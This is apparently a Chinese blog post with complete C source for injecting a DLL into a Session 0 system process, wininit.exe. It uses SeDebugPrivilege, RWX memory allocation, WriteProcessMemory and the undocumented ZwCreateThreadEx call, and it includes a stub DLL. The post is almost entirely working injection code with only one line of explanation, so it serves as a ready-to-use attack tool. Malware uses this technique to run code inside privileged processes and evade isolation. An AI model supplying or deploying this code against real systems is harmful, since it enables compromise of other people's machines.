zoukankan      html  css  js  c++  java
  • [注入] 突破 SESSION 0 隔离的远线程注入

    与传统的CreateRemoteThread函数实现的远线程注入DLL的唯一区别在于,突破SESSION 0远线程注 入技术是使用比CreateRemoteThread函数更为底层的ZwCreateThreadEx函数来创建远线程,而具体的远线 程注入原理是相同的。

    #include<stdio.h>
    #include<windows.h>
    #include<Tlhelp32.h>
    #define NAME "wininit.exe"//被注入的进程
    #define PATH "C:\\Users\\john\\Desktop\\mydll.dll"//要注入的dll绝对路径
    
    BOOL GetProcessIDByName(char *,PDWORD);
    BOOL EnbalePrivileges(HANDLE,char*);
    typedef DWORD (WINAPI *ZwCreateThreadEx )(PHANDLE ThreadHandle,
    									ACCESS_MASK DesiredAccess,
    									LPVOID ObjectAttributes,
    									HANDLE ProcessHandle,
    									LPTHREAD_START_ROUTINE lpStartAddress,
    									LPVOID lpParameter,BOOL CreateSuspended,
    									DWORD dwStackSize,
    									DWORD dw1,
    									DWORD dw2,
    									LPVOID pUnkown); 
    
    void main()
    {
    	HANDLE hProcess = GetCurrentProcess();
    	char* pszPrivilegesName = "SeDebugPrivilege";
    	EnbalePrivileges(hProcess,pszPrivilegesName);
    
    	DWORD pid;
    	BOOL bRet = GetProcessIDByName(NAME,&pid);
    	if(bRet == FALSE)
    	{
    		return;
    	}
    	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,NULL,pid);//打开进程句柄
    	if(!hand)
    		return;
    	LPVOID lpaddress = VirtualAllocEx(hand,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//申请指定大小内存,分配读写执行权限
    	if(!lpaddress)
    		return;
    	bool write = WriteProcessMemory(hand,lpaddress,PATH,MAX_PATH,NULL);//实现注入
    	if(!write)
    		return;
    	ZwCreateThreadEx myZwCreateThreadEx = (ZwCreateThreadEx)GetProcAddress(LoadLibrary("ntdll.dll"),"ZwCreateThreadEx");
    	HANDLE hRemoteThread = NULL;
    	myZwCreateThreadEx(&hRemoteThread,PROCESS_ALL_ACCESS,NULL,hand,(LPTHREAD_START_ROUTINE)LoadLibrary,lpaddress,0,0,0,0,NULL);//创建线程执行dll
    }
    
    BOOL GetProcessIDByName(char *name,PDWORD pid)
    {
    	PROCESSENTRY32 pe32 = {0};
    	pe32.dwSize = sizeof(PROCESSENTRY32);
    	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//拍进程快照
    	if (INVALID_HANDLE_VALUE == hProcessSnap)
    	{
    		printf("CreateToolhelp32Snapshot Error :%d",GetLastError());
    	}
    	BOOL Ret = Process32First(hProcessSnap,&pe32);//枚举快照
    	while(Ret)
    	{
    		if( !strcmp(pe32.szExeFile,name))
    		{
    			*pid = pe32.th32ProcessID;
    		}
    		Ret = Process32Next(hProcessSnap,&pe32);//下一进程信息
    	}
    	return TRUE;
    }
    BOOL EnbalePrivileges(HANDLE hProcess,char* pszPrivilegesName)
    {
    	HANDLE hToken = NULL;
    	LUID luidValue = {0};
    	TOKEN_PRIVILEGES tokenPrivileges = {0};
    	BOOL bRet = FALSE;
    	DWORD dwRet = OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES,&hToken);
    	printf("%d",GetLastError());
    	if(false == dwRet)
    	{
    		return FALSE;
    	}
    	bRet = LookupPrivilegeValue(NULL,pszPrivilegesName,&luidValue);//获取特权值LUID
    	if(false == bRet)
    	{
    		return FALSE;
    	}
    	tokenPrivileges.PrivilegeCount = 1;
    	tokenPrivileges.Privileges[0].Luid = luidValue;
    	tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    	bRet = AdjustTokenPrivileges(hToken,FALSE,&tokenPrivileges,0,NULL,NULL);
    	if(false == bRet)
    	{
    		return FALSE;
    	}
    	dwRet = GetLastError();
    	if(ERROR_SUCCESS == dwRet)
    	{
    		printf("SUCCESS!!");
    	}
    }
    
    
    

    在这里插入图片描述

    dll 代码:

    #include<stdio.h>
    #include<windows.h>
    
    BOOL WINAPI DllMain(HANDLE hmoudle,DWORD call,LPVOID lpreser)
    {
    	OutputDebugString("success");
    	return true;
    }
    
  • 相关阅读:
    nosql数据库:mongodb,redis,memcached,其优缺点和使用应用场景
    进程和线程的定义和区别
    PHP中的 抽象类(abstract class)和 接口(interface)
    简单理解php的socket编程
    session跨域共享解决方案
    MySQL 对于千万级的大表要怎么优化
    关于存session,cookie还是数据库或者memcache的优劣,部分网上抄录
    MYSQL 索引类型、什么情况下用不上索引、什么情况下不推荐使用索引
    MySQL把一个大表拆分多个表后,如何解决跨表查询效率问题
    PHP + NGINX 控制视频文件播放,并防止文件下载
  • 原文地址:https://www.cnblogs.com/csnd/p/15613288.html
Copyright © 2011-2022 走看看